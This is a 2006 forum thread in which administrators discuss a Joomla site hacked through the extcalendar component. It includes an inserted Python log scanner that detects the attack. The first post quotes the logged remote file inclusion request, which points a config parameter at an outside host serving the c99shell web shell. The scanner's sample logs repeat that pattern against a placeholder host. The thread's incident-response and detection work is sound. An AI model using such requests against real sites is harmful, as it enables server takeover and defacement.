#1
Join Date: Mar 2006
Posts: 36
Hey guys, should this be a warning?? -->HacKeD By TamTurk<--

We got hacked twice last night. We are pretty sure the little fcuk's used extcalendar2 to get a Backdoor.PHP trojan onto the server. And we know what that means, yes... everything is pretty fcuked. We fixed it, but they left yet another little PHP shell (c99shell) hidden deep down... and the whole thing started again. Particularly embarrassing for our clients, as the site got defaced pretty badly with some Islam/Terror stuff...

We went through all the logs and actually found out that the stuff slept there for quite a while. Furthermore, we are pretty damn sure the files were placed through:

.../components/com_extcalendar/admin_events.php

The whole command looked like this:

Code:
```
.../components/com_extcalendar/admin_events.php?CONFIG_EXT%5BLANGUAGES_DIR%5D=http%3A%2F%2Fsvt.nukleon.us%2Ftools%2Fc99shell.txt%3F&act=ls&d=%2Fweb%2Fsites%2Fuser%2F12%2F&sort=0a"
```

We checked out other potentially vulnerable scripts, such as the upload facilities of Docman and ZOOm... but both have their upload facilities disabled in the front-end, and the files seem secure...

Any opinions

Last edited by dkone : August 9th, 2006 at 09:21.
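The log review described in the post above can be automated. The following is an added example, not part of the original thread: it scans access-log lines for query parameters whose decoded value is a remote URL, the pattern seen in the `CONFIG_EXT[LANGUAGES_DIR]` request. The log lines are constructed, `attacker.example` is a placeholder host, and the function names are hypothetical.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Request line of a common/combined-format access log entry.
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# A parameter value that starts with a remote scheme is the include indicator.
REMOTE_RE = re.compile(r'^(?:https?|ftp)://', re.IGNORECASE)

def remote_include_params(request_uri):
    """Return [(param, value)] for query parameters carrying a remote URL."""
    hits = []
    query = urlsplit(request_uri).query
    # parse_qsl percent-decodes once, so CONFIG_EXT%5BLANGUAGES_DIR%5D
    # becomes CONFIG_EXT[LANGUAGES_DIR].
    for name, value in parse_qsl(query, keep_blank_values=True):
        value = unquote(value).strip()  # second pass catches double encoding
        if REMOTE_RE.match(value):
            hits.append((name, value))
    return hits

def scan(lines):
    """Return (client_ip, path, param, value) for each suspicious request."""
    findings = []
    for line in lines:
        m = REQUEST_RE.search(line)
        if not m:
            continue  # not a parseable request line
        uri = m.group(1)
        client_ip = line.split(' ', 1)[0]
        for name, value in remote_include_params(uri):
            findings.append((client_ip, urlsplit(uri).path, name, value))
    return findings

# Constructed sample log lines (documentation IP ranges, placeholder host).
SAMPLE_LOG = [
    '203.0.113.7 - - [09/Aug/2006:03:12:44 +0000] "GET /components/com_extcalendar/'
    'admin_events.php?CONFIG_EXT%5BLANGUAGES_DIR%5D=http%3A%2F%2Fattacker.example'
    '%2Ftools%2Fshell.txt%3F&act=ls&sort=0a HTTP/1.1" 200 5120',
    '198.51.100.20 - - [09/Aug/2006:03:13:01 +0000] "GET /index.php?'
    'option=com_extcalendar&Itemid=5 HTTP/1.1" 200 8431',
    '203.0.113.9 - - [09/Aug/2006:03:15:10 +0000] "GET /components/com_extcalendar/'
    'admin_events.php?CONFIG_EXT%5BLANGUAGES_DIR%5D=http%253A%252F%252F'
    'attacker.example%252Fx.txt HTTP/1.0" 200 77',
]

if __name__ == "__main__":
    for ip, path, name, value in scan(SAMPLE_LOG):
        print(f"{ip} {path} {name} -> {value}")
```

Legitimate parameters that carry full URLs, such as redirect or return targets, will also match, so review hits by script path and parameter name before blocking source addresses.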
#2
Join Date: Jul 2005
Posts: 76
Quote:
Plus you got it right with the defined( '_VALID_MOS' ) missing code issue. That alone will help a lot. See my other post on my response to being hacked. So far, 100% success and the attempts are dwindling. The bastards host their scripts on web sites as well, so be sure to block those sites' IPs and, if possible, entire CIDR blocks of the hacker's source IP. See my other post on that.
#3
Join Date: Mar 2006
Posts: 36
Cool, thanks man...

I think we got it resolved... there's a fix out, since about 2 weeks, from a Joomla team, replacing all the vulnerable files in extcal.

http://forum.joomla.org/index.php?topic=75390.msg389913

Yes, these guys keep hammering the doors... but so far everything keeps up. Tomorrow I will look at your other posts... and start blocking IP ranges...

Cya
dk